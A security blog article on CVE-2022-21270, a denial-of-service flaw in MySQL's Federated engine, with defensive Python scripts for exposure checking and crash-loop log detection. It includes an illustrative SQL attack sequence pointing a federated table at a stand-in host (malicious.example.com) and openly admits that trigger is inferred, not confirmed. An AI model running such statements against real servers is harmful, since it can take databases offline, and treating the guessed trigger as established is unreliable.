In this article, we’ll dig deep into CVE-2022-21270, a serious Denial-of-Service (DoS) vulnerability in Oracle MySQL Server, specifically within the Federated storage engine component. This issue lets authenticated users with high-level privileges crash the server, potentially taking your databases offline. Using simple language, this exclusive deep dive will help you understand the bug, see example exploit code, and learn how to protect your systems.

What is CVE-2022-21270?

CVE-2022-21270 is a vulnerability in the Federated component of Oracle MySQL Server. Affected releases are 5.7.36 and earlier and 8.0.27 and earlier. An attacker who already holds high-level credentials (a DBA-class account) and can reach the server over the network can crash it repeatedly, which amounts to a complete denial of service.

*CVSS 3.1 Base Score*: 4.9
*Impact*: Availability (Denial-of-Service)
Full CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Federated Storage Engine 101

MySQL’s Federated engine lets you create a local table that is a proxy for a table on another MySQL server: queries against it are turned into SQL sent over a client connection to the remote host, and the rows that come back are relayed to the caller. That is convenient for distributed setups, but the engine runs inside the mysqld process itself, so a weakness in how it parses connection definitions or handles what the remote end sends back can take down the whole instance, not just the one table.

Who is Affected?

Oracle detailed this in their January 2022 Critical Patch Update Advisory. Affected versions:

MySQL Server 5.7.36 and earlier, and 8.0.27 and earlier

If you use the Federated storage engine, or you allow users to create federated tables, you need to pay attention to this vulnerability.

How Does the Exploit Work?

Oracle’s advisory and the NVD entry say only that an authenticated, high-privileged user with network access can cause a hang or frequently repeatable crash of the server; neither describes the trigger. Because the affected component is Server: Federated, the most plausible reading (and it is an inference, not a published root cause) is that crafted SQL involving Federated tables, either in how a remote table definition or connection is declared or in what the remote side returns, reaches a code path that aborts mysqld. That gives a classic DoS:

1. Attacker obtains a high-privilege MySQL account (root or a DBA-class user).
2. Attacker creates a Federated table pointing at a remote destination with malformed connection info, or at a host that is not a MySQL server at all.
3. Any query or operation on the Federated table (SELECT, INSERT, etc.) makes the server contact the remote end, and code that cannot handle the malformed response correctly crashes the process.

Here is an illustrative example of the kind of statements that could trigger such a crash on a vulnerable MySQL server:

```sql
-- Connect as a privileged user (CREATE SERVER requires SUPER)
CREATE SERVER malicious_server
FOREIGN DATA WRAPPER mysql
OPTIONS (
    HOST 'malicious.example.com', -- could be localhost or an attacker-controlled host
    DATABASE 'fake_db',
    USER 'fake_user',
    PASSWORD 'fake_pass'
);

-- Create a Federated table that uses the server definition above.
-- (The equivalent inline form is
--  CONNECTION='mysql://fake_user:fake_pass@malicious.example.com:3306/fake_db/crash_table')
CREATE TABLE crash_me (
    id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    data VARCHAR(100)
) ENGINE=FEDERATED
CONNECTION='malicious_server/crash_table';

-- Any access to the table now makes mysqld open a client connection to the
-- remote host; on a vulnerable build this is where a crash could occur:
SELECT * FROM crash_me;
```

The key point is that the remote end is under the attacker’s control: it may not exist, may be a non-MySQL service, or may answer in a way the Federated engine mishandles. On an affected build that is enough to abort the mysqld process and take every database on the instance offline, and the attacker can repeat it as often as they like.

Proof-of-Concept Details

The full proof-of-concept (PoC) has not been made available publicly by Oracle or security researchers, but the information above is based on references noted in the CVE and vendor advisories. If you want to test for exposure safely, never run code like the example above on production databases! Test only in isolated, non-production environments.

How to Protect Your Systems

1. Upgrade MySQL Server to 5.7.37, 8.0.28, or later (builds are on the MySQL Downloads Page).
2. If you don’t use Federated tables, don’t enable the engine: FEDERATED is off by default and is only active when mysqld is started with the --federated option. The vulnerable code is unreachable while it is off.
3. Restrict privileges: limit who holds SUPER (required for CREATE SERVER) and who is allowed to create FEDERATED tables, and review the server definitions already stored in mysql.servers.
4. Restrict network access to your MySQL server, for example with firewalls and network segmentation, so a compromised admin credential cannot be used from anywhere.
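A quick way to check whether a given instance and account are exposed is to combine the conditions above. The following script is an added example written for this article (it is not Oracle’s or MySQL’s own tooling): it works offline on text a DBA already has from SELECT VERSION(), SHOW ENGINES and SHOW GRANTS run through the mysql client in batch mode (mysql -B, which prints tab-separated rows), and reports whether the build is in the affected range, whether FEDERATED is actually enabled, and whether the account holds SUPER or ALL PRIVILEGES globally. The sample inputs at the bottom are constructed for the demonstration, not captured from a real server.

```python
"""Offline exposure check for CVE-2022-21270.

Added example for this article, not Oracle's or MySQL's own tooling. It works
on text a DBA already has from three statements run with the mysql client in
batch mode (mysql -B, which prints tab-separated rows):

    SELECT VERSION();
    SHOW ENGINES;
    SHOW GRANTS FOR 'some_user'@'some_host';

The sample inputs at the bottom are constructed, not real server output.
"""
import re

# First fixed release in each supported series, per the January 2022 CPU.
FIXED_IN = {(5, 7): (5, 7, 37), (8, 0): (8, 0, 28)}

GRANT_RE = re.compile(r"^GRANT (.+?) ON (\S+) TO ", re.IGNORECASE)


def parse_version(version_string):
    """'8.0.27-0ubuntu0.20.04.1' -> (8, 0, 27). Distro suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version_string.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version_string!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version_string):
    """True for 5.7.36 and earlier or 8.0.27 and earlier.

    Any other series (5.6 and older, which were out of support and got no fix;
    forks such as MariaDB, which have their own advisories) is conservatively
    reported as True so that it gets looked at by hand.
    """
    version = parse_version(version_string)
    fixed = FIXED_IN.get(version[:2])
    return True if fixed is None else version < fixed


def federated_enabled(show_engines_output):
    """Parse SHOW ENGINES rows; True when FEDERATED has Support YES or DEFAULT.

    FEDERATED is off unless mysqld was started with --federated, and the bug
    is only reachable when the engine is on, so this is the first thing to check.
    """
    for row in show_engines_output.strip().splitlines():
        cols = row.split("\t")
        if len(cols) >= 2 and cols[0].strip().upper() == "FEDERATED":
            return cols[1].strip().upper() in ("YES", "DEFAULT")
    return False


def can_create_servers(show_grants_output):
    """True if any GRANT line gives SUPER or ALL PRIVILEGES on *.*.

    The privilege list is split on commas before matching so that an account
    named, say, `supervisor` does not produce a false hit on SUPER.
    """
    for stmt in show_grants_output.splitlines():
        m = GRANT_RE.match(stmt.strip())
        if not m:
            continue
        privileges = {p.strip().upper() for p in m.group(1).split(",")}
        if m.group(2) == "*.*" and privileges & {"SUPER", "ALL PRIVILEGES"}:
            return True
    return False


def exposure_report(version_string, show_engines_output, show_grants_output):
    """Combine the three checks; 'exposed' is True only when every condition holds."""
    affected = is_affected(version_string)
    enabled = federated_enabled(show_engines_output)
    privileged = can_create_servers(show_grants_output)
    return {
        "affected_version": affected,
        "federated_enabled": enabled,
        "account_can_create_servers": privileged,
        "exposed": affected and enabled and privileged,
    }


# Constructed sample inputs (not real server output).
SAMPLE_VERSION = "8.0.27-0ubuntu0.20.04.1"
SAMPLE_ENGINES = (
    "Engine\tSupport\tComment\tTransactions\tXA\tSavepoints\n"
    "InnoDB\tDEFAULT\tSupports transactions, row-level locking, and foreign keys\tYES\tYES\tYES\n"
    "FEDERATED\tNO\tFederated MySQL storage engine\tNULL\tNULL\tNULL\n"
    "MyISAM\tYES\tMyISAM storage engine\tNO\tNO\tNO\n"
)
SAMPLE_GRANTS = "GRANT ALL PRIVILEGES ON *.* TO `app_admin`@`%` WITH GRANT OPTION"

if __name__ == "__main__":
    print(exposure_report(SAMPLE_VERSION, SAMPLE_ENGINES, SAMPLE_GRANTS))
```

With the sample inputs the build is affected and the account is powerful enough, but FEDERATED is disabled, so the report comes back not exposed; flipping the engine to YES is what makes the instance reachable. Run SHOW GRANTS for every account that can log in remotely, not just the one you are using.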

Watch the error log for repeated mysqld crashes and restarts, and, if the general query log or audit log is enabled, for CREATE SERVER statements and DDL that creates FEDERATED tables. A crash that recurs every time a particular table is queried is exactly the pattern this vulnerability would produce.
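Detection logic for that log check, as an added example written for this article (not MySQL’s own tooling): it parses the MySQL 8.0 error-log format for the "mysqld got signal" header mysqld prints when it aborts, pairs each crash with the restart line that follows it, flags crashes that recur within a short window (the "frequently repeatable crash" the advisory describes), and notes whether a stack frame printed after the crash header names the Federated handler (ha_federated). The log text embedded in the script is constructed for the demonstration; the frame addresses are made up, and the ha_federated frame is an assumption about what a symbolised trace would show.

```python
"""Crash-loop detector for the MySQL 8.0 error log.

Added example for this article (not MySQL's own tooling). The log text below
is constructed for the demonstration; frame addresses are made up and the
ha_federated frame is an assumption about what a symbolised trace would show.
"""
import re

CRASH_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}) UTC - mysqld got signal (\d+)")
# MY-010116 is the 'starting as process' line mysqld 8.0 logs on every start.
START_RE = re.compile(r"^\d{4}-\d{2}-\d{2}T\S+Z \d+ \[System\] \[MY-010116\]")


def parse_error_log(text):
    """Return one dict per crash: time (seconds of day), signal, federated, restarted.

    Lines between a crash header and the next startup line are treated as that
    crash's stack trace. Times are seconds-of-day, so the script assumes the
    log it is given covers a single UTC day.
    """
    events = []
    current = None
    for line in text.splitlines():
        m = CRASH_RE.match(line)
        if m:
            hh, mm, ss, sig = (int(g) for g in m.groups())
            current = {"time": hh * 3600 + mm * 60 + ss, "signal": sig,
                       "federated": False, "restarted": False}
            events.append(current)
            continue
        if START_RE.match(line):
            if current is not None:
                current["restarted"] = True
            current = None
            continue
        if current is not None and "ha_federated" in line:
            current["federated"] = True
    return events


def crash_summary(text, window_seconds=600):
    """Crash count, whether any two crashes fall within the window, whether any
    trace mentioned the Federated engine, and whether every crash was followed
    by a restart (a supervisor restarting mysqld is what lets the loop continue)."""
    events = parse_error_log(text)
    repeated = any(later["time"] - earlier["time"] <= window_seconds
                   for earlier, later in zip(events, events[1:]))
    return {
        "crashes": len(events),
        "repeated": repeated,
        "federated_frames": any(e["federated"] for e in events),
        "all_restarted": all(e["restarted"] for e in events),
    }


# Constructed sample log: two crashes three minutes apart, each followed by a restart.
SAMPLE_ERROR_LOG = """\
2022-01-20T09:30:00.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.27) starting as process 1023
2022-01-20T09:30:01.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.27'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server - GPL.
09:40:58 UTC - mysqld got signal 11 ;
Most likely, you have hit a bug, but this error can also be caused by malfunctioning hardware.
Thread pointer: 0x7f3c1c000b70
/usr/sbin/mysqld(my_print_stacktrace(unsigned char const*, unsigned long)+0x3d) [0x55e0a1f2c1ad]
/usr/sbin/mysqld(ha_federated::rnd_next(unsigned char*)+0x1f2) [0x55e0a21a3b12]
2022-01-20T09:41:05.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.27) starting as process 1187
09:43:40 UTC - mysqld got signal 11 ;
Most likely, you have hit a bug, but this error can also be caused by malfunctioning hardware.
/usr/sbin/mysqld(my_print_stacktrace(unsigned char const*, unsigned long)+0x3d) [0x55e0a1f2c1ad]
/usr/sbin/mysqld(ha_federated::rnd_next(unsigned char*)+0x1f2) [0x55e0a21a3b12]
2022-01-20T09:43:47.000000Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.27) starting as process 1302
"""

if __name__ == "__main__":
    print(crash_summary(SAMPLE_ERROR_LOG))
```

A single crash with no Federated frame is not evidence of anything; what you are looking for is the combination of a short inter-crash interval, a restart after each one, and the same handler in every trace. Feed the script the error log from the host (the file named by log_error, or the journal if mysqld logs to stderr) one day at a time.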

## Learn More / References

- Oracle Security Alert (CPUJan2022)
- NVD Entry for CVE-2022-21270
- MySQL Documentation: Federated Storage Engine

Final Thoughts

CVE-2022-21270 is a classic example of how a misused feature — in this case, the Federated engine — can become a weapon in the wrong hands. Even though attackers need high-level database privileges, if they compromise an admin account, they can easily take down your service.

Patch ASAP. If you don’t need Federated, turn it off. If you notice strange crashes, review your logs for abnormal federated table usage.

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 04/19/2022 04:08:00 UTC